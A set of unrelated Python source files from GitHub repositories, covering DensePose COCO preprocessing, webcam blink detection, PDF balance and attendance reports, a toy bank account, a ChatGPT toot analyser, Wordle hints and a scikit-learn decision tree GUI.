    joints_idx = [19, 20, 21, 22, 23, 9, 8, 10, 7, 11, 6, 3, 2, 4, 1, 5, 0]
    # bbox expansion factor
    scaleFactor = 1.2
    # structs we need (one parallel list per output field)
    imgnames_, scales_, centers_, parts_, smpl_2dkps_, dp_annot_ = [], [], [], [], [], []
    im_id_, id_ = [], []
    # subfolders for different subsets
    subfolders = {'train': 'train2014', 'minival': 'val2014', 'valminusminival': 'val2014', 'test': 'test2014'}
    # json annotation file
    json_path = os.path.join(dataset_path,
                             'annotations',
                             'densepose_coco_2014_{}.json'.format(subset))
    # NOTE(review): the file object returned by open() is never closed —
    # consider a `with` block.
    json_data = json.load(open(json_path, 'r'))
    imgs = {}
    for img in json_data['images']:
        imgs[img['id']] = img
    has_dp_count = 0
    no_dp_count = 0
    for annot in json_data['annotations']:
        # NOTE(review): `id` shadows the builtin for the rest of this loop.
        im_id, id = annot['image_id'], annot['id']
        # Skip annotations without DensePose masks.
        if 'dp_masks' not in annot.keys():
            # print('dp_masks not in annot')
            no_dp_count += 1
            continue
        # keypoints processing: (17, 3) rows of (x, y, visibility),
        # visibility collapsed to a 0/1 flag.
        keypoints = annot['keypoints']
        keypoints = np.reshape(keypoints, (17, 3))
        keypoints[keypoints[:, 2] > 0, 2] = 1
        # if sum(keypoints[5:, 2] > 0) < 12:
        #     no_dp_count += 1
        #     continue
        has_dp_count += 1
        # check if all major body joints are annotated
        # if sum(keypoints[5:,2]>0) < 12:
        #     continue
        # create smpl joints from coco keypoints
        smpl_2dkp = kp_coco2smpl(keypoints.copy())
        # image name (relative to the dataset root: subset folder + file name)
        image_id = annot['image_id']
        img_name = str(imgs[image_id]['file_name'])
        img_name_full = join(subfolders[subset], img_name)
        # keypoints scattered into the 24-joint global order
        part = np.zeros([24, 3])
        part[joints_idx] = keypoints
        # scale and center derived from the COCO bbox (scale in 200px units)
        bbox = annot['bbox']
        center = [bbox[0] + bbox[2]/2, bbox[1] + bbox[3]/2]
        scale = scaleFactor*max(bbox[2], bbox[3])/200
        # Raw DensePose fields are carried through unchanged.
        dp_annot = {'bbox': annot['bbox'],
                    'dp_x': annot['dp_x'],
                    'dp_y': annot['dp_y'],
                    'dp_I': annot['dp_I'],
                    'dp_U': annot['dp_U'],
                    'dp_V': annot['dp_V'],
                    'dp_masks': annot['dp_masks']
                    }
        # store data
        imgnames_.append(img_name_full)
        centers_.append(center)
        scales_.append(scale)
        parts_.append(part)
        smpl_2dkps_.append(smpl_2dkp)
        dp_annot_.append(dp_annot)
        im_id_.append(im_id)
        id_.append(id)
    print('# samples with dp: {}; # samples without dp: {}'.format(has_dp_count, no_dp_count))
    # store the data struct
    if not os.path.isdir(out_path):
        os.makedirs(out_path)
    out_file = os.path.join(out_path, 'dp_coco_2014_{}.npz'.format(subset))
    np.savez(out_file, imgname=imgnames_,
             center=centers_,
             scale=scales_,
             part=parts_,
             smpl_2dkps=smpl_2dkps_,
             dp_annot=dp_annot_,
             im_id=im_id_,
             id=id_)
def kp_coco2smpl(kps_coco):
    """Map 17 COCO keypoints (x, y, vis) to 24 SMPL joints (x, y, conf).

    Directly mapped limb joints inherit half the COCO visibility as their
    confidence; derived joints (pelvis, spine, head, collars, hands, feet)
    get confidence 0.5 when their parents are available, else stay zero.
    """
    out = np.zeros((24, 4))  # columns: x, y, scratch, confidence

    # Direct limb correspondences: SMPL joint index <- COCO keypoint index.
    smpl_idx = [1, 2, 4, 5, 7, 8, 16, 17, 18, 19, 20, 21]
    coco_idx = [11, 12, 13, 14, 15, 16, 5, 6, 7, 8, 9, 10]
    out[smpl_idx, :2] = kps_coco[coco_idx, :2]
    out[smpl_idx, 3] = kps_coco[coco_idx, 2] / 2.

    def set_midpoint(dst, a, b):
        # dst <- midpoint of two already-derived SMPL joints, confidence 0.5.
        out[dst, :2] = np.mean(out[[a, b], :2], axis=0)
        out[dst, 3] = 0.5

    # Pelvis (0) from the two COCO hips; chest (12) from the two shoulders.
    if all(kps_coco[[11, 12], 2] > 0):
        out[0, :2] = np.mean(kps_coco[[11, 12], :2], axis=0)
        out[0, 3] = 0.5
    if all(kps_coco[[5, 6], 2] > 0):
        out[12, :2] = np.mean(kps_coco[[5, 6], :2], axis=0)
        out[12, 3] = 0.5
    # Head (15): halfway between the chest and the COCO nose.
    if out[12, 3] > 0 and kps_coco[0, 2] > 0:
        out[15, :2] = (out[12, :2] + kps_coco[0, :2]) / 2.
        out[15, 3] = 0.5
    # Spine joints interpolated along the pelvis -> chest axis.
    if out[0, 3] > 0 and out[12, 3] > 0:
        set_midpoint(6, 0, 12)
        out[9, :2] = out[6, :2]
        out[9, 3] = 0.5
    if out[0, 3] > 0 and out[6, 3] > 0:
        set_midpoint(3, 0, 6)
    # Collar bones between the upper spine (9) and each shoulder.
    if out[9, 3] > 0 and out[16, 3] > 0:
        set_midpoint(13, 9, 16)
    if out[9, 3] > 0 and out[17, 3] > 0:
        set_midpoint(14, 9, 17)

    # Hands and feet duplicate the wrist / ankle positions.
    for src, dst in ((7, 10), (8, 11), (20, 22), (21, 23)):
        if out[src, 3] > 0:
            out[dst, :2] = out[src, :2]
            out[dst, 3] = 0.5

    # Expose the confidence in column 2 and return (24, 3).
    out[:, 2] = out[:, 3]
    return out[:, :3].copy()
if __name__ == '__main__':
    # Standalone run: extract the train split using repo-local paths.
    import path_config as cfg
    db_coco_extract(cfg.COCO_ROOT, 'train', 'notebooks/output/extras')
    # db_coco_extract(cfg.COCO_ROOT, 'minival', 'notebooks/output/extras')
| HongwenZhang/DaNet-DensePose2SMPL | datasets/preprocess/dp_coco.py | dp_coco.py | py | 5,303 | python | en | code | 208 | github-code | 36 |
3829108374 | # coding: utf-8
# 前端测试是否眨眼,用于活体检测 Front-end test blinks for biopsy
from scipy.spatial import distance as dist
from imutils import face_utils
import time
import dlib
import cv2
def eye_aspect_ratio(eye):
    """Return the eye aspect ratio (EAR) for six eye landmarks.

    ``eye`` holds the six (x, y) landmark points of one eye in the usual
    dlib 68-landmark ordering; the ratio approaches zero as the eye closes.
    """
    vertical_1 = dist.euclidean(eye[1], eye[5])   # inner upper/lower lid pair
    vertical_2 = dist.euclidean(eye[2], eye[4])   # outer upper/lower lid pair
    horizontal = dist.euclidean(eye[0], eye[3])   # eye corner to eye corner
    return (vertical_1 + vertical_2) / (2.0 * horizontal)
def main():
    """Watch the webcam until one sufficiently long blink is detected.

    Liveness check: counts consecutive frames whose eye aspect ratio (EAR)
    is below EYE_AR_THRESH; when the eye reopens after at least
    EYE_AR_CONSEC_FRAMES closed frames, returns 1.  Press 'q' to quit
    without detecting a blink (returns None).
    """
    shape_predictor = "shape_predictor_68_face_landmarks.dat"
    EYE_AR_THRESH = 0.27  # EAR threshold below which the eye counts as closed
    EYE_AR_CONSEC_FRAMES = 33  # the number of consecutive frames the eye must be below the threshold
    # initialize the frame counters and the total number of blinks
    COUNTER = 0
    TOTAL = 0
    # NOTE(review): TOTAL is drawn on screen but never incremented; the
    # function returns on the first completed blink instead.
    # initialize dlib's face detector (HOG-based) and then create
    # the facial landmark predictor
    print("[INFO] loading facial landmark predictor...")
    detector = dlib.get_frontal_face_detector()
    predictor = dlib.shape_predictor(shape_predictor)
    # grab the indexes of the facial landmarks for the left and right eye, respectively
    (lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS["left_eye"]
    (rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS["right_eye"]
    # start the video stream thread
    print("[INFO] starting video stream thread...")
    print("[INFO] print q to quit...")
    vs = cv2.VideoCapture(1)  # camera index 1 — presumably an external webcam; confirm
    time.sleep(1.0)
    # loop over frames from the video stream
    while True:
        # grab the frame from the threaded video file stream, resize it, and convert it to grayscale channels)
        _, frame = vs.read()
        frame = cv2.resize(frame, (0, 0), fx=0.75,fy=0.75)
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        # detect faces in the grayscale frame
        rects = detector(gray, 0)
        # loop over the face detections
        for rect in rects:
            # determine the facial landmarks for the face region, then
            # convert the facial landmark (x, y)-coordinates to a NumPy array
            shape = predictor(gray, rect)
            shape = face_utils.shape_to_np(shape)
            # extract the left and right eye coordinates, then use the
            # coordinates to compute the eye aspect ratio for both eyes
            leftEye = shape[lStart:lEnd]
            rightEye = shape[rStart:rEnd]
            leftEAR = eye_aspect_ratio(leftEye)
            rightEAR = eye_aspect_ratio(rightEye)
            # average the eye aspect ratio together for both eyes
            ear = (leftEAR + rightEAR) / 2.0
            # compute the convex hull for the left and right eye, then visualize each of the eyes
            leftEyeHull = cv2.convexHull(leftEye)
            rightEyeHull = cv2.convexHull(rightEye)
            cv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)
            cv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)
            # check to see if the eye aspect ratio is below the blink
            # threshold, and if so, increment the blink frame counter
            if ear < EYE_AR_THRESH:
                COUNTER += 1
            # otherwise, the eye aspect ratio is not below the blink threshold
            else:
                # if the eyes were closed for a sufficient number of then increment the total number of blinks
                if COUNTER >= EYE_AR_CONSEC_FRAMES:
                    return 1
                # reset the eye frame counter
                COUNTER = 0
            # draw the total number of blinks on the frame along with the computed eye aspect ratio for the frame
            cv2.putText(frame, "Blinks: {}".format(TOTAL), (10, 30),
                cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
            cv2.putText(frame, "EAR: {:.2f}".format(ear), (300, 30),
                cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
        cv2.imshow("Frame", frame)
        key = cv2.waitKey(1) & 0xFF
        # if the `q` key was pressed, break from the loop
        if key == ord("q"):
            break
    # do a bit of cleanup
    cv2.destroyAllWindows()
if __name__ == '__main__':
    main()
| HollowMan6/Lanck-Face-Recognition-Lock-Competition-Backend-Code | Development-Board/DetectBlinks.py | DetectBlinks.py | py | 4,286 | python | en | code | 22 | github-code | 36 |
41165135533 | # -*- coding: utf-8 -*-
'''
This file is part of Habitam.
Habitam is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
Habitam is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public
License along with Habitam. If not, see
<http://www.gnu.org/licenses/>.
Created on Jul 21, 2013
@author: Stefan Guna
'''
from habitam.downloads.common import habitam_brand, signatures, MARGIN
from reportlab.lib import colors
from reportlab.lib.pagesizes import A4, landscape
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.units import cm
from reportlab.platypus.doctemplate import SimpleDocTemplate
from reportlab.platypus.flowables import Spacer
from reportlab.platypus.paragraph import Paragraph
from reportlab.platypus.tables import Table, TableStyle
import logging
import tempfile
logger = logging.getLogger(__name__)
# Page geometry: the report is rendered in landscape, so the portrait A4
# width becomes the page height and the portrait height becomes the width.
__HEIGHT__ = A4[0]
__WIDTH__ = A4[1]
def __assets(building, day):
    """Collect the association's asset positions for *day*.

    Returns a dict with cash/bank balances of standard accounts, the
    sign-flipped outstanding apartment debt, accumulated tenant penalties,
    and the (always zero here) undistributed-invoice total.
    """
    result = {}
    # Cash-box and bank balances of the standard ('std') accounts.
    for mt in ['cash', 'bank']:
        # Bind mt as a default so the predicate is safe even if it is stored
        # and called after the loop advances.
        is_mt = lambda ac, mt=mt: ac.money_type == mt and ac.type == 'std'
        result[mt] = building.balance_by_type(is_mt, day)
    ap_pending = 0
    penalties_pending = 0
    for ap in building.apartments():
        ap_pending += ap.balance(day)
        # Call penalties() once and reuse the value (the original called it
        # twice per apartment); `is not None` is the idiomatic None test.
        penalties = ap.penalties(day)
        if penalties is not None:
            penalties_pending += penalties
    # Current payment list owed by apartments, sign-flipped to an asset.
    result['apartment_pending'] = ap_pending * -1
    # Tenants' overdue penalties, sign-flipped likewise.
    result['penalties_pending'] = penalties_pending * -1
    # Supplier invoices not yet distributed to a list: everything is
    # distributed automatically, so this entry is always 0.
    result['outstanding_invoices'] = 0
    return result
def __liabilities(building, day):
    """Collect the association's liability positions for *day*.

    One balance per account type: working fund ('rulment'), repairs fund,
    penalties fund, special funds, and unpaid third-party invoices.
    """
    return {fund: building.balance_by_type(lambda ac: ac.type == fund, day)
            for fund in ['rulment', 'repairs', 'penalties', 'special', '3rd party']}
def __balance_format(canvas, doc):
    # Page-decoration callback for SimpleDocTemplate: draws the centred
    # report title and the Habitam branding on every page.  Reads the
    # building/day back from doc.habitam_data, which __to_pdf attaches.
    canvas.saveState()
    canvas.setFontSize(16)
    t = u'Situația soldurilor elementelor de activ și pasiv pentru %s la %s'
    canvas.drawCentredString(__WIDTH__ / 2.0, __HEIGHT__ - 100,
               t % (doc.habitam_data['building'].name, doc.habitam_data['day']))
    habitam_brand(canvas, __WIDTH__, __HEIGHT__)
    canvas.restoreState()
def __format_data(data):
    # Build the two-sided (assets | liabilities) balance table as a reportlab
    # Table flowable.  Row order and Romanian labels follow the statutory
    # asset/liability statement layout; the final row holds the totals.
    styles = getSampleStyleSheet()
    assets = data['assets']
    liabilities = data['liabilities']
    d = [['NR.\nCRT.', 'ELEMENTE DE ACTIV', 'VALORI\n(LEI)', 'ELEMENTE DE PASIV', 'VALORI\n(LEI)'],
         ['1.', Paragraph(u'Sold în casă', styles['Normal']), assets['cash'], Paragraph('Sold fond de rulment', styles['Normal']), liabilities['rulment']],
         ['2.', Paragraph(u'Sold conturi la bănci', styles['Normal']), assets['bank'], Paragraph(u'Sold fond de reparații', styles['Normal']), liabilities['repairs']],
         ['3.', Paragraph(u'Sume neachitate de proprietarii din asociație pentru lista de plată curentă', styles['Normal']), assets['apartment_pending'], Paragraph('Sold fond sume speciale', styles['Normal']), liabilities['special']],
         ['4.', Paragraph(u'Restanțe existente la data întocmirii acestei situații', styles['Normal']), assets['penalties_pending'], Paragraph('Soldul altor fonduri legal stabilite', styles['Normal']), '0'],
         ['5.', Paragraph(u'Debitori, alții decât mebrii asociației', styles['Normal']), '0', Paragraph('Furnizori pentru facturi neachitate', styles['Normal']), '0'],
         ['6.', Paragraph(u'Acte de plată pe luna în curs, nerepartizate proprietarilor', styles['Normal']), assets['outstanding_invoices'], Paragraph(u'Creditori diverși', styles['Normal']), liabilities['3rd party']],
         ['7.', Paragraph(u'Acte de plăți pentru cheltuielile aferente fondurilor de reparații, speciale, de penalizări care nu au fost încă scăzute din fondurile respective', styles['Normal']), '0', '', ''],
         ['', Paragraph(u'TOTAL PARTEA I', styles['Normal']), sum(assets.values()), Paragraph(u'TOTAL PARTEA II', styles['Normal']), sum(liabilities.values())]
         ]
    table = Table(d, colWidths=[1.3 * cm, 7 * cm, 4 * cm, 7 * cm, 4 * cm])
    # Styling: bold centred header row, centred numeric/index columns,
    # and a full grid with an outer box.
    table.setStyle(TableStyle([
                               ('FONT', (0, 0), (-1, 0), 'Helvetica-Bold'),
                               ('ALIGN', (0, 0), (-1, 0), 'CENTER'),
                               ('VALIGN', (0, 0), (-1, 0), 'MIDDLE'),
                               ('ALIGN', (0, 0), (0, -1), 'CENTER'),
                               ('VALIGN', (0, 0), (0, -1), 'MIDDLE'),
                               ('ALIGN', (2, 0), (2, -1), 'CENTER'),
                               ('VALIGN', (2, 0), (2, -1), 'MIDDLE'),
                               ('ALIGN', (4, 0), (4, -1), 'CENTER'),
                               ('VALIGN', (4, 0), (4, -1), 'MIDDLE'),
                               ('INNERGRID', (0, 0), (-1, -1), 0.25, colors.black),
                               ('BOX', (0, 0), (-1, -1), 0.25, colors.black)
                               ]))
    return table
def __to_pdf(temp, data):
    # Render the one-page landscape-A4 balance report into the open file
    # object *temp* (title/signature block + the table from __format_data).
    doc = SimpleDocTemplate(temp, pagesize=landscape(A4), leftMargin=MARGIN,
                            rightMargin=MARGIN, topMargin=MARGIN,
                            bottomMargin=MARGIN,
                            title=u'Situația activ/pasiv pentru %s' % data['building'].name,
                            author='www.habitam.ro')
    flowables = [Spacer(1, 6 * cm), __format_data(data), Spacer(1, cm), signatures()]
    # habitam_data is read back by the page-decoration callback __balance_format.
    doc.habitam_data = data
    doc.build(flowables, onFirstPage=__balance_format, onLaterPages=__balance_format)
def download_balance(building, day):
    """Render the asset/liability balance PDF for *building* at *day*.

    Returns an open NamedTemporaryFile containing the generated PDF; the
    caller is responsible for reading and closing it.
    """
    report_data = {
        'building': building,
        'day': day,
        'assets': __assets(building, day),
        'liabilities': __liabilities(building, day),
    }
    logger.debug('Balance is %s' % report_data)
    output = tempfile.NamedTemporaryFile()
    __to_pdf(output, report_data)
    return output
| habitam/habitam-core | habitam/downloads/balance.py | balance.py | py | 6,509 | python | en | code | 1 | github-code | 36 |
35778628261 | from report import report_sxw
from osv import osv
import pooler
import time
from datetime import datetime
from dateutil.relativedelta import relativedelta
from tools.translate import _
class report_attendance_parser(report_sxw.rml_parse):
    """OpenERP report parser exposing employee/attendance helpers to the
    attendance Mako template via localcontext."""
    def __init__(self, cr, uid, name, context):
        super(report_attendance_parser, self).__init__(cr, uid, name, context=context)
        # Functions callable from the report template.
        self.localcontext.update({
            'get_employee':self._get_employee,
            'get_work_time':self._get_work_time,
        })
    def _get_employee(self,employee_ids):
        # Browse the hr.employee records, or False for an empty/false input.
        if employee_ids:
            return self.pool.get('hr.employee').browse(self.cr,self.uid,employee_ids)
        else:
            return False
    def _get_work_time(self,employee_id,date_print):
        # Collect sign_in/sign_out pairs for one employee on one day
        # (date_print formatted 'YYYY-MM-DD'); returns a list of dicts or False.
        sign_in='%s 00:00:00'%date_print
        sign_out='%s 23:59:59'%date_print
        if employee_id:
            employee=[]
            attendance_ids=self.pool.get('hr.attendance').search(self.cr,self.uid,[('employee_id','=',employee_id),('name','>=',sign_in),('name','<=',sign_out)],order="employee_id,name ASC")
            #print 'attendance_ids==================',attendance_ids
            attendance_datas=self.pool.get('hr.attendance').browse(self.cr,self.uid,attendance_ids)
            dummy={
                'sign_in': False,
                'sign_out':False,
            }
            # NOTE(review): each iteration rebuilds `dummy` wholesale, and the
            # expression resets a previously captured sign_in as soon as it is
            # truthy (dummy['sign_in']==False becomes False).  As written, a
            # sign_in followed by a sign_out never yields a complete pair —
            # this looks like a long-standing bug; confirm against the report
            # output before changing behaviour.
            for y in attendance_datas:
                dummy={
                    'sign_in':dummy['sign_in']==False and y.action == 'sign_in' and y.name,
                    'sign_out':dummy['sign_out']==False and y.action == 'sign_out' and y.name,
                }
                #print "===========>",dummy
                if dummy['sign_in'] and dummy['sign_out']:
                    employee.append(dummy)
                    dummy={
                        'sign_in': False,
                        'sign_out':False,
                    }
            return employee
        else:
            return False
# Register the parser with OpenERP's report engine; the report is rendered
# from the Mako template below with a standard header.
report_sxw.report_sxw('report.report.hr.attendance', 'hr.attendance.report.wizard', 'addons/ad_hr_report/report/attendance_report.mako', parser = report_attendance_parser, header = True)
| aryaadiputra/addons60_ptgbu_2013 | ad_hr_report/report/attendance_report_parser_old.py | attendance_report_parser_old.py | py | 2,235 | python | en | code | 0 | github-code | 36 |
7158973131 | import os
import shutil
from pathlib import Path
from os import system
from shutil import rmtree
import shutil
# Base directory for the bank's data files (BalanceCuenta.txt and
# RegistroTransacciones.txt).  Raw string avoids the invalid escape
# sequences ('\P', '\D', ...) that raise a DeprecationWarning since
# Python 3.6 — the resulting path value is byte-for-byte unchanged.
# NOTE(review): the second component starts with a backslash; on Windows,
# a rooted component makes Path effectively ignore Path.home() — confirm
# this is the intended base directory.
mi_ruta = Path(Path.home(), r'\Programacion-Cursos-Desarrollador\Python\Python-proyecto1\Dia7\Banco')
class Persona:
    # Base class holding the name data shared by every person in the bank.
    def __init__(self, nombre, apellido):
        # nombre / apellido: first and last name, plain strings.
        self.nombre = nombre
        self.apellido = apellido
class Cliente(Persona):
    """Bank client whose balance is persisted in BalanceCuenta.txt and whose
    deposits/withdrawals are appended to RegistroTransacciones.txt."""
    def __init__(self, nombre, apellido, numero_cuenta, balance = 0):
        super().__init__(nombre, apellido) # inherited from class Persona
        self.numero_cuenta = numero_cuenta
        self.balance = balance
        # The persisted balance always wins over the constructor argument.
        # NOTE(review): this makes the `balance` parameter effectively dead —
        # confirm that is intended.  Also raises FileNotFoundError/ValueError
        # if the file is missing or not an integer.
        ruta_balance = Path(mi_ruta, 'BalanceCuenta.txt')
        BalanceCuentaLeer = open(ruta_balance)
        contenidoBalanceCuentaLeer = BalanceCuentaLeer.read()
        # print("Prueba balance print: ", contenidoBalanceCuentaLeer)
        # print("Tipo de dato: ", type(contenidoBalanceCuentaLeer))
        balance_int = int(contenidoBalanceCuentaLeer)
        # print("Tipo de dato 2: ", type(contenidoBalanceCuentaLeer))
        self.balance = balance_int
        # print(type(self.balance))
        BalanceCuentaLeer.close()
    def __str__(self):
        return f"Cliente: { self.nombre } { self.apellido }\nNumero de Cuenta: { self.numero_cuenta }\nBalance: ${ self.balance }"
    def depositar(self, monto_deposito):
        # Add the deposit, append it to the transaction log, and persist
        # the new balance (write_text overwrites the whole file).
        self.balance += monto_deposito
        ruta_depositar = Path(mi_ruta, 'RegistroTransacciones.txt')
        ruta_balance = Path(mi_ruta, 'BalanceCuenta.txt')
        archivoRegistroTransacciones = open(ruta_depositar, "a")
        archivoRegistroTransacciones.write(f"{ monto_deposito } - INGRESO\n")
        archivoRegistroTransacciones.close()
        # Path.write_text(ruta_depositar, str(monto_deposito)) would be wrong
        # here: it replaces the file instead of appending a log line.
        Path.write_text(ruta_balance, str(self.balance))
        print("Deposito Aceptado")
    def retirar(self, monto_retiro):
        # Withdraw only when funds suffice; mirrors depositar() otherwise.
        if self.balance >= monto_retiro:
            self.balance -= monto_retiro
            ruta_depositar = Path(mi_ruta, 'RegistroTransacciones.txt')
            ruta_balance = Path(mi_ruta, 'BalanceCuenta.txt')
            archivoRegistroTransacciones = open(ruta_depositar, "a")
            archivoRegistroTransacciones.write(f"{monto_retiro} - RETIRO\n")
            archivoRegistroTransacciones.close()
            Path.write_text(ruta_balance, str(self.balance))
            print("Retiro Realizado")
        else:
            print("Fondos Insuficientes Para el Retiro")
def crear_cliente():
    """Prompt for name, surname and account number, and build a Cliente."""
    nombre = input("Ingrese su Nombre: ")
    apellido = input("Ingrese su Apellido: ")
    cuenta = input("Ingrese Su Numero de Cuenta: ")
    return Cliente(nombre, apellido, cuenta)
def inicio():
    """Interactive session: create a client, then deposit/withdraw until 'S'."""
    mi_cliente = crear_cliente()
    print(mi_cliente)  # shows name, account number and current balance
    opcion = 0
    while opcion != 'S': # 'S' quits the loop
        print('Elija: Depositar (D), Retirar (R), Salir (S)')
        opcion = input()
        # NOTE(review): comparisons are case-sensitive; lowercase 'd'/'r'/'s'
        # is silently ignored — confirm this is acceptable.
        if opcion == 'D':
            monto_dep = int(input("Monto a Depositar: $"))
            mi_cliente.depositar(monto_dep)
        elif opcion == 'R':
            monto_dep = int(input("Monto a Retirar: $"))
            mi_cliente.retirar(monto_dep)
        print(mi_cliente) # show the client state after each operation
    print("Gracias Por Su Visita - Hasta Luego")
# Runs the interactive banking session when the module is executed/imported.
inicio()
# proyecto: https://www.udemy.com/course/python-total/learn/lecture/28747292#questions
# convertir str a int: https://www.freecodecamp.org/news/python-convert-string-to-int-how-to-cast-a-string-in-python/#:~:text=To%20convert%2C%20or%20cast%2C%20a,int(%22str%22)%20.
# convertir int a str: https://es.stackoverflow.com/questions/364966/como-convertir-un-dato-int-a-string-en-python
| Alexa-Silvermoon/curso-python-proyectos-udemy-federico | Dia7/ProyectoDelDia7 - mejorada cuenta bancaria.py | ProyectoDelDia7 - mejorada cuenta bancaria.py | py | 3,868 | python | es | code | 0 | github-code | 36 |
10022682639 | import os
import re
import openai
from dotenv import load_dotenv
load_dotenv()
openai.api_key = os.environ['OPENAI_API_KEY']
def request_chatgpt(messages: list):
return openai.ChatCompletion.create(
model="gpt-3.5-turbo",
messages=messages,
)
def analyze_toots(mastodon_timelines: list) -> tuple[list[int], str]:
message_content = ''.join([f"id={toot.id} - {re.sub(re.compile('<.*?>'), '', toot.content)}\n" for toot in mastodon_timelines])
response = request_chatgpt(
messages=[
{"role": "user", "content": message_content},
{
"role": "system",
"content": """
You are a professional analyst.
Please output `id list of statements about programming` based on the following constraints and input statements.
# Constraints
- Output no more than 20 IDs.
- Use this format for output : `{id}, {id}, {id}, {id}, {id}`
I'll send you the input data.
""",
},
]
)["choices"][0]["message"]["content"]
relevant_toot_ids = [int(re.sub(r"\D", "", id)) for id in response.split(',') if re.search(r"\d", id)]
return relevant_toot_ids, response
| mio256/mastardon | page/chatgpt_func.py | chatgpt_func.py | py | 1,302 | python | en | code | 1 | github-code | 36 |
25236999928 | def count_substrings(string1, string2):
''' Get the number of subsctrings in two strings
'''
answer = 0
for i in range(len(string1)):
result = ''
for j in range(i, len(string1)):
result += string1[j]
if string2.find(result) != -1:
answer += 1
return answer
print(count_substrings('aab', 'aaaab'))
print(count_substrings('duke', 'duke lester is here'))
| dukelester/geek_for_geek_DSA | strings_dsa.py | strings_dsa.py | py | 428 | python | en | code | 0 | github-code | 36 |
7863927981 | #!/usr/bin/env python3
names= ["thiago",
"joao",
"rafael",
"Rafaela",
"ronaldo",
"joana"]
## estilo funcional
print(*list(filter(lambda nome: nome[0].lower() == "r", names)),sep="\n")
print()
## estilo imperativo
def comeca_b(texto):
return texto[0].lower() == "r"
filtro= filter(comeca_b,names)
filtro= list(filtro)
for i in filtro:
print(i)
| ThiagoRBM/python-base | composicao.py | composicao.py | py | 396 | python | pt | code | 0 | github-code | 36 |
2286638164 | from collections import Counter
def get_hints(word: str, secret_word: str):
word = word.lower()
result = [""] * len(word)
missing_indexes = []
secrect_counter = Counter(secret_word)
for idx, c in enumerate(word):
if c == secret_word[idx]:
result[idx] = "green"
secrect_counter[c] -= 1
else:
missing_indexes.append(idx)
for idx in missing_indexes:
c = word[idx]
if c in secrect_counter and secrect_counter[c] > 0:
result[idx] = "yellow"
secrect_counter[c] -= 1
else:
result[idx] = "black"
if word == secret_word:
return result
else:
return result
| pythonfoo/rest-wordle | rest_wordle/utils.py | utils.py | py | 712 | python | en | code | 0 | github-code | 36 |
9211558964 | import sys
import os
import time
import traceback
import pandas as pd
import seaborn as sns
import pydotplus
import matplotlib.pyplot as plt
import numpy as np
from sklearn.tree import export_graphviz
from sklearn import tree
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GridSearchCV, RandomizedSearchCV
from sklearn import datasets
from sklearn.utils import shuffle
from sklearn.metrics import mean_squared_error
from sklearn.metrics import confusion_matrix, classification_report
sys.path.append('../')
from SOL4Py.ZApplicationView import *
from SOL4Py.ZLabeledComboBox import *
from SOL4Py.ZPushButton import *
from SOL4Py.ZVerticalPane import *
from SOL4Py.ZTabbedWindow import *
from SOL4Py.ZMLModel import *
from SOL4Py.ZScalableScrolledFigureView import *
from SOL4Py.ZScalableScrolledDecisionTreeView import*
Iris = 0
Digits = 1
Wine = 2
BreastCancer = 3
############################################################
# Classifier Model class
class DecisionTreeClassifierModel(ZMLModel):
##
# Constructor
def __init__(self, dataset_id, mainv):
super(DecisionTreeClassifierModel, self).__init__(dataset_id, mainv)
def run(self):
self.write("====================================")
self._start(self.run.__name__)
try:
# 1 Load dataset
self.load_dataset()
# 2 Load or create model
if self.trained():
# 2.1 if trained, load a trained model pkl file
self.load()
else:
# 2.2 else create a model, and train and save it
self.build()
self.train()
self.save()
# 3 Predict for test_data
self.predict()
# 4 Visualize the prediction
self.visualize()
except:
traceback.print_exc()
self._end(self.run.__name__ )
def load_dataset(self):
self._start(self.load_dataset.__name__ )
if self.dataset_id == Iris:
self.dataset= datasets.load_iris()
self.write("loaded iris dataset")
if self.dataset_id == Digits:
self.dataset= datasets.load_digits()
self.write("loaded Digits dataset")
if self.dataset_id == Wine:
self.dataset= datasets.load_wine()
self.write("loaded Wine dataset")
if self.dataset_id == BreastCancer:
self.dataset= datasets.load_breast_cancer()
self.write("loaded BreastCancer dataset")
attr = dir(self.dataset)
self.write("dir:" + str(attr))
if "feature_names" in attr:
self.write("feature_names:" + str(self.dataset.feature_names))
if "target_names" in attr:
self.write("target_names:" + str(self.dataset.target_names))
self.set_model_filename()
self.view.description.setText(self.dataset.DESCR)
X, y = self.dataset.data, self.dataset.target
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(X, y, test_size=0.3, random_state=42)
self._end(self.load_dataset.__name__)
def build(self):
self._start(self.build.__name__)
self.model = tree.DecisionTreeClassifier(random_state=0)
self._end(self.build.__name__)
def train(self):
self._start(self.train.__name__)
start = time.time()
params = {'max_depth':range(3,20)}
grid_search = GridSearchCV(self.model, param_grid=params, n_jobs=4)
grid_search.fit(self.X_train, self.y_train)
self.write("GridSearch BestParams " + str(grid_search.best_params_) )
self.write("GridSearch BestScore " + str(grid_search.best_score_))
self.model = tree.DecisionTreeClassifier(**grid_search.best_params_)
# Class fit method of the classifier
self.model.fit(self.X_train, self.y_train)
elapsed_time = time.time() - start
elapsed = str("Train elapsed_time:{0}".format(elapsed_time) + "[sec]")
self.write(elapsed)
self._end(self.train.__name__)
def predict(self):
self._start(self.predict.__name__)
self.pred_test = self.model.predict(self.X_test)
report = str (classification_report(self.y_test, self.pred_test) )
self.write(report)
self._end(self.predict.__name__)
def visualize(self):
cmatrix = confusion_matrix(self.y_test, self.pred_test)
self.view.visualize(cmatrix, self.model)
############################################################
# Classifier View
class MainView(ZApplicationView):
# Class variables
# ClassifierView Constructor
def __init__(self, title, x, y, width, height):
super(MainView, self).__init__(title, x, y, width, height)
self.font = QFont("Arial", 10)
self.setFont(self.font)
# 1 Add a labeled combobox to top dock area
self.add_datasets_combobox()
# 2 Add a textedit to the left pane of the center area.
self.text_editor = QTextEdit()
